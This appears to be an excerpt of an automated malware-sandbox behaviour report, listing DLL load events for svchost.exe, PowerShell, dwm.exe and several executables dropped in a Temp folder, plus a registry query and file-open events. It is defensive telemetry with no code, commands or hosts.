                          Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: napinsp.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wshbth.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: winrnr.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
